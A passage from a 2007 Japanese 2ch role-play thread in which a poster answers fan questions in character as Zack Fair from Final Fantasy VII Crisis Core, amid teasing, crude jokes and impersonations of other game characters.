ベルトは、そんなに苦しくならない程度の締め付けだから大丈夫。
かがむ度に苦しくなってたら、戦いにも支障がでるだろ?

それと、ソルジャーの服は以外とお気に入りでさっ!
結構軽くて、動きやすい素材なんだよ。

100 :ザックス ◆fZJjtbCv9E :2007/11/13(火) 23:06:34
>>93
これがポーション缶かぁー。
これって、ポーション缶を飾り風にアレンジしたやつだろ?
たしかに俺でも作れそうだな。
でも、気になるのはやっぱり俺のがないってことだな…
何でなんだぁあー!!

>>94
俺も強くなりたいか…
俺だって、まだまだだし、あんただって筋トレとかしてれば、少しずつ強くなるって!
だから、俺も任務がないときには、訓練以外に、スクワットしたり、筋トレして任務に備えてるよ!

けど、強くなるってどういうことだろうな…体だけでなく、心も強くならないといけないから、難しいよな。
>>95
そうだなー。だいたい5分かからないくらいじゃないかな?
ただ、ワックス付けてるだけだし、
結構簡単にできる髪型だと思うけどな。
よかったら、あんたもやってみるか?
前髪も邪魔にならなくなって、スッキリしたし。
しかも、髪型変えて少しだけ俺も大人っぽくなっただろ!?

101 :ザックス ◆fZJjtbCv9E :2007/11/13(火) 23:09:24
>>96
クラウドなら大丈夫だろ。
もう、一人前のソルジャーだからな!

それで、スクワットで死人が出ただなんて、本当かよ!?

だいたい今だと、300回を5セットづつで、
最高回数は1500回くらいだと思うよ。

あんまりやりすぎでも筋肉に負担がかかるから
ほどほどくらいで丁度いいかもな!


それより、最後まで何があってもがんばれか…
何だか重い言葉に感じるけど、何があっても、俺はココを守るよ!
あんたも、ありがとうな!

>>97
人気投票?そんなのがあるのかー。
見てみたら、今のところ俺が3位じゃないかよ!
しかも、クラウド、セフィロスにも勝ってるだなんて、俺にも信じられないよ!
これも、みんなのおかげかな?

これからも、頑張ってココを守るから、みんなもよろしくな!

後、ザックス様ってなんだよ!?
かなりかたっくるしい呼び方してさっ。
気軽にザックスって呼んでくれよ。

102 :以上、自作自演でした。:2007/11/13(火) 23:10:55
ザックス缶無かったっけ?

103 :ザックス ◆fZJjtbCv9E :2007/11/13(火) 23:11:36
>>97
地獄通信って…地獄と通信出来るってコトか?
そんな噂、初めて聞いたよ。

そういえば、昔から良いコトをしたら天国、悪いコトをしたら地獄って話をよく聞いてはいたけど…
本当に天国や地獄ってあるのかな!?
実際に見た人なんていないから
本当に通信出来るのなら、試してみたいよな!

104 :以上、自作自演でした。:2007/11/13(火) 23:13:28
ザックスの尻撫でササッ

ザックスに一票入れたよ。
懺悔。
そのあとリストにレノを発見して、レノにも入れた。

105 :以上、自作自演でした。:2007/11/13(火) 23:14:08
甘党?

106 :ザックス ◆fZJjtbCv9E :2007/11/13(火) 23:32:28
こんばんは!
こんな短時間に人が来るなんて思ってなかったから
また、ビックリしたぞ!

>>102
ポーション缶はたしかに俺のもあるみたいだけど
あのサイトには俺の名前がのってなかったから
気になって言っただけなんだ。
だいたいセフィロスファンが多いだろ?
俺に声援送ってくれるなんて、ココに来てくれるみんなだけだしな!

>>104
うわぁっ!おさわりはナシって言っただろ?
それより俺に入れてくれてサンキュ!
でもレノにも入れたって?まぁ、それはそれでかまわないけど、
レノの口癖がちょっと気になる俺がいるぞ、と。

>>105
甘すぎるのはダメだけど、わりと好きな方かな?

疲れた時には甘いものが食べたくなるっていうだろ?だから、任務後とかにはちょくちょく食べてるよ!
それに、果物も良く食べるな。

107 :以上、自作自演でした。:2007/11/13(火) 23:41:44
睡眠時間はちゃんと取ってるかい?

108 :以上、自作自演でした。:2007/11/13(火) 23:48:29
正直に言えよ

お前二股だろ?エアリスとシスネで

109 :以上、自作自演でした。:2007/11/14(水) 00:02:14
以下のアンケートに答えてください

今演じているキャラ数:
キャラハン暦:
いままでに演じたキャラ数:
完走回数:
逃亡回数:
嫌いなジャンル、キャラハン:
尊敬するキャラハン:
荒らしをした事は:
自作自演をした事は:
同性と異性、どっちがやりやすい?:
個スレと総合、どっちがやりやすい?:
キャラハンをやっていて最悪の失敗談:
なりきりの痛さを本当に自覚してる?:
端末、ブラウザは何を使っていますか?:
自スレ以外の巡回スレを教えて:
キャラネタの自治について:

110 :ザックス ◆fZJjtbCv9E :2007/11/14(水) 00:14:11
>>107
任務がある時は眠れない場合も多いから、
寝れる時にはちゃあんと寝てる
ってか、爆睡してるよ!

やっぱり、睡眠ってのは大事で、寝ないと体がもたないからな。
あんたも遅くまで起きてないで、ちゃんと睡眠をとったほうがいいぞ。
人間、眠気には勝てないからなー。

>>108
二股っていきなり何を言い出すんだよ!

エアリスもシスネも大事な仲間っていうか、友達だろ?
だから、変な誤解はしないでくれよ!

もうこれ以上、俺の前からアンジールやセフィロスのように
いなくなってほしくないから
二人を守ってあげたいし、俺にとって、二人はかけがえのない存在かな?

>>109
いったいキャラハンって何なんだ?
俺は俺でしかないよ!
なんで、悪いけど答えようがないな。




今日はココまで。
それじゃあ、お休みなさい。

111 :クラウド:2007/11/14(水) 00:22:58
そのバスターソードをくれ!!1!

112 :以上、自作自演でした。:2007/11/14(水) 08:53:23
二股どころか、クラウドも股にかけてるだろw

113 :以上、自作自演でした。:2007/11/14(水) 12:59:07
一番好きなマテリアはなんですか?

114 :以上、自作自演でした。:2007/11/14(水) 20:17:32
ザックスの股間をもみもみしたい…。でもオサワリは禁止…
だからこうしてじっと見ている事にしよう。不眠不休で。

115 :以上、自作自演でした。:2007/11/14(水) 22:43:20
ザックスってホント人間として完璧な人だよね!真似したくても簡単にはいかないよ。ザックスは任務以外にも机上業務とかあるの?神羅カンパニーってかっこいいな。

116 :以上、自作自演でした。:2007/11/15(木) 00:41:07
自分が女だったら今頃何してたと思う?

117 :以上、自作自演でした。:2007/11/15(木) 09:30:50
2ndから1stに昇格して
バレンタインチョコどれだけ増えましたか?

CCでザックスファンクラブ会員数10万超えてて吹いたw

118 :以上、自作自演でした。:2007/11/15(木) 10:48:52
7キャラで最後にスがつくキャラはみんな不幸だな
アルファベットなら「ス」にならないのに、お前も悲運な奴だな

119 :サックス:2007/11/15(木) 18:32:11
セフィロス
ザックス
ジェネシス
エアリス
ルーファウスか

120 :以上、自作自演でした。:2007/11/15(木) 21:06:28
もっとあるだろ。
バレットウォーレス
ロッズ
ヤズー
ビッグス

ザックスフェアで快晴って意味なのに
sを付けると、ドエロイ人になるらしい
だから名前にはsついてないんだとどっかで見た。

よかったなお前

121 :以上、自作自演でした。:2007/11/15(木) 23:19:42
セックス・フェラかよwwいやらしいな

122 :以上、自作自演でした。:2007/11/16(金) 12:21:05
お前ら吹いたじゃねーかw

休暇は誰とどーやって過ごしたい?

123 :以上、自作自演でした。:2007/11/16(金) 16:56:45
ソルジャーになれなかったら、他になにしてたと思う?

124 :以上、自作自演でした。:2007/11/16(金) 18:18:44
英雄セフィロスにタメ口ってのも何気にスゴイよね

125 :114:2007/11/16(金) 20:11:58
じーっ

126 :以上、自作自演でした。:2007/11/17(土) 15:47:45
私服はどんな感じ?

127 :ザックス ◆fZJjtbCv9E :2007/11/17(土) 23:21:11
>>111
クラウド、いくら親友でも俺のバスターソードは、
アンジールからもらった大切なものなんだ。
あげられるわけがないだろ?

アンジールと同じように、バスターソードに傷がつくのが嫌で
俺も大切に使ってるからな。
けど、もしも、俺がいなくなるようなことがあったら…
クラウドにバスターソードは預けるよ。

>>112
クラウドを含め、今度は3股だっていいたいのかよ!?

クラウドも俺にとって、大切な親友だ。
それを股にかけてるだなんて、しかもクラウドは男じゃないかよ!
だから、ありえないだろ?っていうか、俺を変な目で見るなぁー!!

たしかに任務が一緒だったり連絡を取り合ったりはしてるけど、
親友として、いろいろ情報交換したり、くだらないコトを話てるだけだよ!

128 :ザックス ◆fZJjtbCv9E :2007/11/17(土) 23:24:20
>>113
そうだなー。いろいろあるから迷うけど…

コメットやメテオも迫力があって、大ダメージを与えてくれるけど、
俺が好きな魔法のマテリアはシンプルに、ファイガかな?
あまりMPも使わず、結構な威力を発揮してくれるし、
みっつの炎で、まとめて敵を倒すのにはすごく楽だからな。
わりと、使う率が高いのがファイガかな。

あとは、HPアップマテリアも俺にとっては魅力的なマテリアかなぁ。

>>114
おいっ!そんなに俺を見つめるなよ!ちょっと恥ずかしいだろ?
それより、俺の股間を触っていったいどうしようっていうんだよ!?
けど、約束を守って、おさわりしなかったコトには感謝するよ。

それより不眠不休って、あんた大丈夫か?
ちゃあんと休まないと、体がもたないぞ!
俺なら定期的に来るようにするから、
しっかり寝て、体を休めて待っててくれよな!

129 :ザックス ◆fZJjtbCv9E :2007/11/17(土) 23:27:25
>>115
俺は、人間的にもまだまだだし、
ソルジャーとしても、もっと成長しなきゃいけないと思ってるから、
あんたが言ってくれるような完璧な人間じゃあないよ。
でも、ありがとうな!そういう風に言ってくれると
すごくうれしいよ。

俺には机上業務はなくて、外で走り回ってるコトが多いいな。
それに、机に座ってやる仕事は俺にはむいてない気がするよ。
外で、敵を薙ぎ倒して、体を動かしてる方が性にあってるみたいだしな!

それから、神羅カンパニーがかっこいいか…
一部の間では神羅カンパニーを好きじゃないって人達がいるのも事実だけど…
これからも、街の平和は俺が守るよ!

>>116
俺が女だったらかー。
そんなコト一度も考えたコトがなかったな。

たぶん、故郷のゴンガガで村を離れず
のんびりとした生活をおくっていたんじゃないかな?
それに村中知ってる人ばかりで、気兼なくゆっくりできる所だしな。

それか、神羅で言ったら、神羅カンパニーの顔でもある
受付係とか、ちょっとやってみたいなとは思うな。

130 :ザックス ◆fZJjtbCv9E :2007/11/17(土) 23:29:50
>>117
バレンタインチョコかぁー。
クラス1stになっても俺の知名度は低いらしく、
セフィロスやジェネシスのように
増えるどころか、チョコを貰ったコトはないよ…

ところで、俺のファンクラブがあるって?
そのことに驚いたよ!

それから、俺のファンが10万人?

なんだか、すごい数だけど想像がつかないな…
これもココに来てくれているみんなのおかげかな?
これからも俺はココでがんばっていくから、あんたもよろしくな!

>>118
俺は自分のコトを悲運だなんて、思ってないけどな。

それに、あこがれてたソルジャーにもなれたし、
アンジールやセフィロス、にはソルジャーとしての誇りや夢、いろんなことを教えてもらった。
クラウドとも一緒に任務をこなして、
色々と楽しいコトや、いろんな人に出会えたコトにも俺は感謝してるよ。
それにソルジャーとして、やりたいことが出来たなんて、
俺としては幸せ者だなぁーって思うよ!

131 :ザックス ◆fZJjtbCv9E :2007/11/17(土) 23:32:13
>>119
こうしてみると名前の最後にスが付く人って、結構いるんだな。
俺も何人いるか、数えてはみたけど…
ビックリしたよ。

けど、みんな悲運な運命をたどったっていうのか…

みんなやりたいことをやって、精一杯生きていると俺は思うけどな。

>>120
更にスが付く人がいるなんて…
それより、あんたは物知りだな!
俺の名前なのに、意味を知らなかったよ!
快晴かぁー。なんか爽やかないい感じがするな。

けど、俺の名前、ZACK FAIRが一歩間違えればドエロイ名前だなんて
なんかちょっとショックだな…

>>121
セックス・フェラじゃなくて、ザックス・フェアだっての!
勝手に人の名前をいやらしくするなよ?
それに、わざと言ってるだろ!?
しかもあんた自分で言っておいて、いやらしいなとか言うなよなー
人の名前を何だと思ってるんだよ?
結構、自分の名前だけど気に入ってるんだからさっ!
これからは、ザックスってちゃんと呼んでくれよな!

132 :ザックス ◆fZJjtbCv9E :2007/11/17(土) 23:34:16
>>121
休暇かぁ。そうだなぁー。
あんまり休暇って俺にはないんだけど、
どっか行くとしたら、コスタ・デル・ソルかな?
青い海に、青い空の下で一人でのーんびりするってのも、
いいかもしれないなー

みんなで行くのも楽しいとは思うけど、
あんまり一人でのんびりと過ごすコトがないから、
たまには任務や訓練、いろんなコトを忘れて
ゆっくりしたいかな?

>>122
ソルジャーになってなかったら、何してたんだろうなぁ?
俺にはソルジャーになる!っていう夢しかもってなかったからな。

たぶん、座っている仕事よりも
体を動かすコトの方がむいてると思う。
だから前に誘ってくれた、炭鉱夫だったり、
故郷で農園の手伝いとかしてたかもしれないなー
今の所、これくらいかな?

133 :ザックス ◆fZJjtbCv9E :2007/11/17(土) 23:36:09
>>124
セフィロスにタメ口ってそんなにすごいコトか?
英雄っていっても、セフィロスは気楽に話してくれるし、
セフィロスが英雄だからって、あんまりにもガチガチになるのってのも変だろ?
それに、俺としては自分をさらけだして話をした方が
相手も気さくに話してくれると思ってるから
誰であろうと、いつも通りの俺でいくよ!

>>125
おわっ!
なんか痛いくらいの視線を感じると思ってたら、あんただったのかよ!

まだ俺をじーっと見てるだなんて、相当な物好きだな。

それより、ちゃんと休んでるのか?
なんだかそっちの方が心配になるじゃないかよ!
俺はちゃんとみんなのトコに帰ってくるから、
ゆっくり休めよ!

134 :ザックス ◆fZJjtbCv9E :2007/11/17(土) 23:38:36
>>126
ソルジャーになってから、私服はほとんど持っていないんだ。

いつ、何処で任務の要請がくるかわからないから
基本的にはソルジャーの服をいつでも着てるかんじで、
それに、いかなる時でもソルジャーの証として
わかるように着ているみたいなもんかな?

でもソルジャーの服は着やすいから、結構お気に入りなんだよ。

135 :以上、自作自演でした。:2007/11/18(日) 00:13:56
クラウドとくだらない事話してるって例えばどんな事?
今日は空が青いな
タンポポは黄色いな
……。
……。

とかだったら聞きたくない

>村中知ってる人ばかり
BCの刀男とは面識ありましたか?彼もゴンガガ出身だとか。

136 :以上、自作自演でした。:2007/11/18(日) 13:48:14
勉強しなきゃいけないのにやる気出ない。
ぼすけて・・・

137 :以上、自作自演でした。:2007/11/18(日) 16:56:08
良スレの予感
頑張って続けてもらいたいな

138 :以上、自作自演でした。:2007/11/18(日) 22:44:27
ザックス見てると、自分も頑張ろうと思える。
ありがとうザックス。

139 :以上、自作自演でした。:2007/11/19(月) 09:49:43
お前いいやつ

140 :以上、自作自演でした。:2007/11/19(月) 12:39:15
ちゃあんと、って言い方が可愛い

自覚してる口癖は?

141 :以上、自作自演でした。:2007/11/19(月) 15:11:31
事実かどうかはっきり教えて下さい。
http://game13.2ch.net/test/read.cgi/ff/1194456078/l50

142 :クラウド:2007/11/20(火) 00:30:09
そういえば起きたとき痛かったな・・・・ザックス、まさか!!

143 :以上、自作自演でした。:2007/11/20(火) 10:11:05
クラウドお前自重wwwwwバロスw

CCのクラウド相手なら、ザックス裏山

144 :エアリス:2007/11/20(火) 12:14:51
ザックス・・嫌い!

145 :以上、自作自演でした。:2007/11/20(火) 18:39:43
どうしてザックスはCCであんな気持ち悪い人になったの?

146 :エアリス:2007/11/20(火) 21:40:18
しっ・・!それ言っちゃ、駄目!
ザックス、悲しむ。だから・・・ね?

147 :ザックス ◆fZJjtbCv9E :2007/11/20(火) 23:14:06
>>135
だいたい、任務でドコにいるとか、
今日はこんなことがあったとか
その日にあったいろいろなコトをメールしたり、話したりしてるんだ。

ところで、刀男って、あだ名か?
タークスだったと思うんだけど
ゴンガガ出身の奴がいるとは噂で聞いたことがある。
まだ逢ったコトがないからわからないけど
もしかしたら、知り合いかもしれないな!

>>136
勉強、大変なのか?
できることなら一緒に手伝って助けてあげたいけど、
自分でやるからこそ、実につくんだと思うよ。

やる気がでないのなら、一気に勉強しなくても
リラックスしつつ、気分転換しながらやるのも
いいかもしれないぞ。
それに、詰め込みすぎるのも、気が重くなるだけだろうし、
ゆっくりやっていくのもいいんじゃないのかな?

それか、自分がやりやすい方法を見付けることが大事かもな。

俺も訓練ばっかりだと、ちょっと飽きたりするから、自分なりにアレンジを加えながらやってるんだよ。

それより勉強がんばれよ!

148 :ザックス ◆fZJjtbCv9E :2007/11/20(火) 23:16:15
>>137
そう言ってもらえると、うれしいよ!ありがとうな!

けど、ココに来てくれる人達がみんな優しいから
ココも穏やかなんだと思うよ!
それに、俺もココに来るのがすごく楽しみになってる。

これからも楽しくやっていきたいし、
俺がココを守って最後まで頑張るかららさっ。
あんたも、また来てくれよな!

>>138
俺を見てると頑張ろうって思えるって?
そんなコト言われたらうれしくなるじゃないか!
それに、ありがとうだなんて、ちょっと照れるよ。

あんたみたいに優しいコトを言ってくれる人がいて、
少しでも、あんたの力になったっていうなら、俺もココに来て良かったって思えるし
これからも頑張ろうって気持になるよ!
だから、あんたもありがとうな!

149 :ザックス ◆fZJjtbCv9E :2007/11/20(火) 23:19:05
>>139
いい奴だなんて、ありがとうな!
ココに来てくれる人みんながいい人すぎて
俺も、気持ち的にすごい力になってるんだよ!

けど、男としてもまだまだな俺だから、
これからの成長ぶりに期待しといてくれよな!

もっとソルジャーとしても、人間的にも強くなりたいって思ってるからさ。

>>140
可愛いだなんて、ちょっと照れるじゃないかよ!

まだまだ俺もかっこいいって言われない所が、
子犬のザックスってあだながつく所以なのかな…

それより、口癖かぁ。
自分で気付いたのは、最後に、「な」が付くコトくらいかな。
「〜だな」とか。
あんたから見た俺の口癖ってあるのか?
なんだか少し気になったからさ!

150 :ザックス ◆fZJjtbCv9E :2007/11/20(火) 23:21:01
>>141
どっから、どうみたらそういう発想になるのか、逆に聞きたいくらいだよ!
ってか、俺とクラウドは男じゃないか!!

ただ、クラウドとは友達で、任務が一緒だったり
連絡を取り合ってるだけだろ?
それから、任務は上からの命令で一緒になるくらいで、
俺が決めるわけじゃあないし。


それに、真実は一つ、だろ?
俺にとってクラウドも大切な親友で、
それ以上でも以下でもなく
ただ、いなくなってほしくない存在なだけだよ。

>>142
クラウド、お前の言ってるコトを見て、吹いたじゃないか!
それに、まさかも何もないっての!
冗談で言うのはいいけど、俺が変な目で見られるだろうがぁ!


それより、クラウドが魔晄中毒になって、面倒をみるのが大変だったんだぞ!
ぐったりしてたからずっと背負ってたし、
もしかしたら、クラウドを引きずった時にでも、どこか打ったのかもしれないな。
けど、それくらいは勘弁してくれよな!
すごい量の神羅兵に囲まれて、ざんざんな目にあったのは俺なんだぞ…

だから、少しくらいのケガは許してくれよ!?

151 :ザックス ◆fZJjtbCv9E :2007/11/20(火) 23:22:40
>>143
羨ましいって、ドコがだよ?
クラウドと一緒なのが羨ましいってコトか?

女の子と一緒ならまだしも、クラウドは男だっての!
まぁ、クラウドは口下手な奴だけど、すごくいい奴だよ。

ちょっと頼りなさそうなトコもあるけど、やる時にはやってくれるし、
それに少しずつクラウドも成長して、男らしくなったよな。
俺も負けずにこれからも頑張るよ!

>>144
エアリス、久しぶりだな!
花売り、順調に進んでるのか?
全然手伝えなくってゴメンな!
けど、約束は守るし、ミッドガルを花でいっぱいにするってのを
時間があったら俺も一緒にやっていくから
もうちょっとだけ、待っててくれよな!

それより、急に俺のコトを嫌い!だなんて、
何か俺がやらかしたのかな?
だったら、気付かなくてゴメン…
それでも俺は、エアリスのコトを大切な親友だと思ってるし、
みんなと同じように、エアリスをこれからも守り続けるよ。

152 :ザックス ◆fZJjtbCv9E :2007/11/20(火) 23:24:57
>>145
どうして気持悪い人になったかって?
俺は昔も今もそう変わってないと思うけど、
あんたからは気持悪くなったように見えるのか…

ドコから気持悪い人になったかは、俺自身ではわからないけど、

あんたの言ってくれたコトはちゃんと受けとめるよ。
そんな風に見られないよう、これからも俺は男として成長していけるように
頑張ろうって思えるからさ。

>>146
エアリス、フォローしてくれてありがとな!
けど、俺はぜーんぜん悲しんでなんかいないよ。
むしろハッキリ言われた方がうれしいかな?

言われないで気付かないより、言われて気付いた方がよっぽどいいだろ?
その方が自分を変えていけるしな。
人それぞれ思うことはあるだろうし、
見方が違うのは当然だと思うから
俺としては、言ってもらって逆に感謝してるよ。

153 :以上、自作自演でした。:2007/11/21(水) 07:15:11
本物のザックスならさんざんな目にあったのは俺なんだぞなんて言わない
すごい数の神羅兵の中に友達いなかったの?
容赦なく大量殺人したよね

154 :以上、自作自演でした。:2007/11/21(水) 12:25:48
オナニーは一日何回してるの?若いからヤりまくってるのかな?

155 :以上、自作自演でした。:2007/11/21(水) 16:29:23
ゴンガガで置き去りしたり敵兵のうろつくミッドガルに連れて突っ込むとは驚き
なぜクラウドに一言も謝らないの?

156 :ユフィ:2007/11/21(水) 18:42:14
シュシュシュシュ!!!

157 :クラウド:2007/11/21(水) 22:11:48
ザックス・・・わかってる、俺も応援してるよ。



・・・少しくらいの・・・・きず?・・・・・・・うへへへっ

158 :以上、自作自演でした。:2007/11/21(水) 23:28:11
ザックスにも風邪うつしにきた!


ザックスは風邪ひかなそうだけど。

159 :以上、自作自演でした。:2007/11/21(水) 23:49:48
バカはなんとかだもんな

風邪引いた事すら気づいてなさそう
でもそんな野生っぽいバカさがイイよ

160 :以上、自作自演でした。:2007/11/22(木) 01:34:17
昔はかっこよかったのにね

161 :以上、自作自演でした。:2007/11/22(木) 19:12:24
お酒が入ると「変わる」って人から言われた事ある?
それはどんな風に?

162 :ザックス ◆fZJjtbCv9E :2007/11/23(金) 22:42:29
>>153
さんざんな目にあっただなんて、俺の言い方が悪かったよ。
しかも俺らしくなかったよな。ゴメン…

けど、あの時は無我夢中だったんだ
それに、向かってきたソルジャーの中には友達はいなかった。
でも、その中に友達がいないからといって
殺してもいいだなんて思ってはいない。
今までは仲間だったんだし。
できることなら、戦闘は避けたかったんだよ。

けど、向かってくるのが敵だとしたら
本気でいかないと殺られる世界だというのはわかってもらいたい。
早く、そういうコトがなくなる世界になるといいな。

>>154
あんた何言ってるんだよ!
よくそんなコトが言えるな…

俺の場合、訓練や任務で疲れてるから
すぐに眠っちゃうし、
あんたが思ってるようなコトはしてないな。
ってことで、あとはあんたの想像にまかせるよ…

163 :ザックス ◆fZJjtbCv9E :2007/11/23(金) 22:44:21
>>155
そうだな。あんたの言う通りかもな…

あの時はいろいろなコトが急に起こって
俺の中でも思うことはあったんだけど、
クラウドを助けたい気持だけでいっぱいだったんだ。
それに、よかれと思ってしたことが裏目にでてしまったかもな。

今度クラウドに逢ったら、ちゃんと謝っておくよ。
いろいろと俺のダメだったコトを指摘してくれてありがとな。
遅いかもしれないけど、今度からはちゃんと気を付けるから。

>>156
ユフィじゃないか!元気にしてたか?

相変わらずシュシュシュってやってるけど、
全然俺に当たってないぞ?
ところで、ウータイの様子はどうだ?
その様子だと調子はいいのかな?
それに、何かあったら俺に出来ることがあれば手伝うよ。
それより、ユフィも元気そうでよかったよ。
また、遊びに来てくれよな!

164 :ザックス ◆fZJjtbCv9E :2007/11/23(金) 22:46:04
>>157
クラウド、ケガ大丈夫だったか!?
それに、ちゃんと守ってやれなくてゴメン!

それでも、あの時はクラウドを助けたい一心でいっぱいだったんだよ…

けど、わかってるって言ってくれたクラウドの一言で、
心が救われた気がして俺はうれしいよ!
それに、応援までしてくれて、ありがとう。

それより、またウヘヘへって…クラウド大丈夫か!!?

>>158
風邪をうつしに来たわりには元気だな?

あんたの言うとおり、俺はココ何年か風邪なんかひいてないよ。
それより、最近寒くなってきたから、
ちゃあんと暖かくして寝るんだぞ。

俺に風邪をうつして、あんたが治るってんなら、
風邪なんか俺が気合いで治すよ!

それに、早く風邪が治るといいな!

165 :ザックス ◆fZJjtbCv9E :2007/11/23(金) 22:48:27
>>159
そうだな。バカは風邪ひかないっていうからな…

たしかに俺は風邪なんか全くひかないし
いつでも元気だよ。
もしかしたら、あんたが言ってるコトが正解かもな。気付いてない可能性も、なきにしもあらずってね。

けど、俺のコトを野生っぽいバカだなんて、
やっぱ何事にも、まずは突っ込んでいく俺の性格上そう見えるのかな?

けど、そんな俺がイイだなんて言ってくれてありがとな!

>>160
昔の方がかっこよかったのにねって、今の俺じゃあダメか?

前に比べたら、俺もソルジャーとして
少しは成長してると思うんだけどな…

けど、まだまだ俺はこれから成長していこうと思ってるし、
誰が見ても男らしい強い男になるよ!
これからもよかったら、俺の成長っぷりを見ていてほしいな。

166 :ザックス ◆fZJjtbCv9E :2007/11/23(金) 22:49:58
>>161
俺はお酒は飲まないことにしてるんだ。
いつ任務が来るかわからないだろ?
任務がきた時に酔っぱらってたんじゃ、
任務を遂行できなくなる可能性があるし。
だから、いつでも俺はシラフだよ。

たまにはおもいっきり飲んでみたいなぁって
思うこともあるよ。
けど、俺がお酒を飲んだらよけいに元気になって
人にからみそうな気がするよ。

167 :以上、自作自演でした。:2007/11/24(土) 00:40:06
ちゃあんとw
見るたびに笑うww案外お茶目だなw

168 :以上、自作自演でした。:2007/11/24(土) 00:59:36
ザックス可愛いwやっぱ仔犬だねw

169 :ルード:2007/11/24(土) 01:11:16
・・・・・・。
・・・お前の着ている服と靴が欲しい

170 :以上、自作自演でした。:2007/11/24(土) 14:19:08
ザックスに飲ませたい。おもいっきり飲ませたい
ドンペリをピラミッドに積んで飲ませてやんよ

ところで、携帯の電話帳、おねーちゃんの登録は何件だ?
500件以上ありそうw

171 :以上、自作自演でした。:2007/11/24(土) 16:57:11
マスクしてたのに友達いないなんて良くわかるねすごい
上の追跡命令に従っただけでみんな殺された
ただの兵士にも家族や友人がいたのに
ザックスの言ってる事変

172 :以上、自作自演でした。:2007/11/24(土) 18:35:51
逆の立場で言えば上の命令だからといって、殺されるのも冗談じゃないよな・・・

173 :以上、自作自演でした。:2007/11/24(土) 20:14:13
これやるよ

つ 3弾ポーション(7本)

2弾とちっとも味変わってない
うぇえな不味さ。
ザックス、足下!お花踏んじゃダメだろW

174 :以上、自作自演でした。:2007/11/24(土) 21:04:09


ホモだち、だろ?




175 :以上、自作自演でした。:2007/11/25(日) 01:13:03
アンジールとクラウドはどっちが美味しかった?

176 :セフィロス:2007/11/25(日) 02:26:22
俺と結婚してくれ

177 :以上、自作自演でした。:2007/11/25(日) 07:11:15
意識が薄れて

178 :クラウド:2007/11/25(日) 14:40:38
CCみて友達やめた

179 :以上、自作自演でした。:2007/11/25(日) 16:02:43
飼うとしたらどんなペットがいい?
好みは?

俺の好みは黒のツンツンで、
いつもうるさいくらいにはしゃいでて
落ち着きの無い子犬。
怒ったらすげーしゅんとして、可愛いんだぜ

180 :以上、自作自演でした。:2007/11/25(日) 17:56:33
神羅カンパニーの正社員になりたいんだけど難しい?

181 :以上、自作自演でした。:2007/11/25(日) 22:22:23
カンセルを掘ったの?

182 :以上、自作自演でした。:2007/11/26(月) 08:23:17
もう出てこないでねv

183 :以上、自作自演でした。:2007/11/26(月) 12:55:47
昨日2周目をクリアした。
歯は全部で何本ありますか?

184 :以上、自作自演でした。:2007/11/26(月) 18:48:44
どうしてたくさんいた彼女が消されたの?

185 :以上、自作自演でした。:2007/11/27(火) 10:26:07
おはよー。
低血圧なんだけど、ザックスは朝から元気っぽくていいな。
飯、の一言で飛び起きてそうだけど、どうなん?

186 :エアリス:2007/11/27(火) 17:09:21
まさか・・・ザックス・・クラウドと・・・



187 :以上、自作自演でした。:2007/11/27(火) 22:21:30
受け取って下さい
つ 花柄のラブレター

188 :ザックス ◆fZJjtbCv9E :2007/11/27(火) 22:53:39
>>167
変構、使っちゃうんだよなちゃあんとって言葉。
一応、ちゃんとよりも更にちゃんとする意味で使ってる。

それより、俺はアンジールのように、そこまで真面目な方じゃあないし
わりと大雑把な性格なんだよな。
これでも少しは直そうとはしてるんだけど、
昔からこんな性格だからさっ。
あんまり深く考えないほうだし、俺は楽観的かもしれないな。
それに、考えるよりも先に体が動くタイプだなって昔言われたことがあるよ。

>>168
可愛いだなんて笑いながら言われたら、恥ずかしいだろ?
それより、あんたから見た俺はまだまだ仔犬のザックスってトコか…
俺も男だし、早くかっこいいって言われる男に成長しないとな。
いつまでたっても仔犬のままだなんて、イヤだし
それに英雄になるって、でっかい目標が俺にはあるから、
それに向かって、これからも頑張るよ!

189 :ザックス ◆fZJjtbCv9E :2007/11/27(火) 22:55:19
>>169
あの無口なルードが俺の服を欲しがるだなんて、
一体どういうコトだ?

その前に俺の服じゃあサイズが合わないと思うし、

俺としてはタークスの制服の方が似合ってると思うよ!
それに、タークスのスーツ姿って
ちょっぴり俺としてはかっこいいって思うからから
俺も着てみたいかな?
けど、気になるのはスーツだと動きにくくないのかってコトかな?

>>170
ドンペリ山積みだなんて、あんたすごいな。

俺も、たまには浴びるほど飲んでみたいって思うよ。
それに、あんたとだったら楽しく飲めそうだし。
けど、酔っぱらってあんたにからんだとしても
俺はしらないからな。
ちゃんと介抱してくれよ?

それより、数えたことはないけど
俺の携帯にそこまでおねーちゃんの登録件数はないっての!
どっちかって言ったら、残念なコトに男友達の方が多いかな?

190 :ザックス ◆fZJjtbCv9E :2007/11/27(火) 22:56:45
>>171
兵士に限らず、誰にでも家族や友達はいるだろ?
それに、俺にだって家族や友達はいる。
けど、危険は承知で俺もソルジャーになったし
兵士だってそうだと思う。
敵だから殺して、殺されてっていうのは俺だってどうかと思うよ。
それに、話し合いで何でも解決できるわけじゃないってコトだ。
それで解決できるなら、兵士もソルジャーもいらないだろ?

みんな、それでも危険をおかして戦ってるんだ。
それに、俺だって人同士でなんか戦いたくなんかない。
けど、どうしても戦わなきゃいけない時だってある。
友達を殺れって上から言われたら、
ずっと尊敬して慕っていた人が敵として向かってきたとしたらあんたならどうする?

俺もアンジールとは戦いたくなかった。
けど、本気で相手が向かってくるのであれば、こっちも本気で戦うのが礼儀だと思う。
戦いたくはないけど、戦うしか方法は残されていないんだから…
それとも、なにもせずにだまって殺られるのか、
どっちかしか残念ながら俺には思いつかないし、方法はないと思う…

191 :ザックス ◆fZJjtbCv9E :2007/11/27(火) 22:58:02
>>172
そうだな。上の命令は基本的に絶対だってコトだな…

けど、例外というか、シスネだけはわかってくれた。
それに、アンジールや、ジェネシスの追跡任務を俺がまかされたのは、
話し合いで解決できるかもしれないと
上が思ったからかもしれないってセフィロスが言ってたな。
結果は話し合いで解決できず、戦うコトになったのがすごく残念だったよ。

けど、俺も戦いたくない相手だっているし、
元仲間だった兵士とだって戦いたくはなかったけど
兵士達も上の命令で動いてるだけだから、しかたのないことだったんだ…

>>173
ポーションくれるのか?ありがとう。
けど、そんなに不味いかな?
よく飲んでるから、俺には味の違いも麻痺してわからないや。
まぁ傷を治してくれる薬みたいなものだし、
良薬口に苦しっていうだろ?


うわっ!ゴメン!!
足元に花があるなんて全く気付かなかったよ!
そういえば、エアリスにも、お花踏まないって
よく怒られたっけ。

192 :ザックス ◆fZJjtbCv9E :2007/11/27(火) 22:59:23
>>174
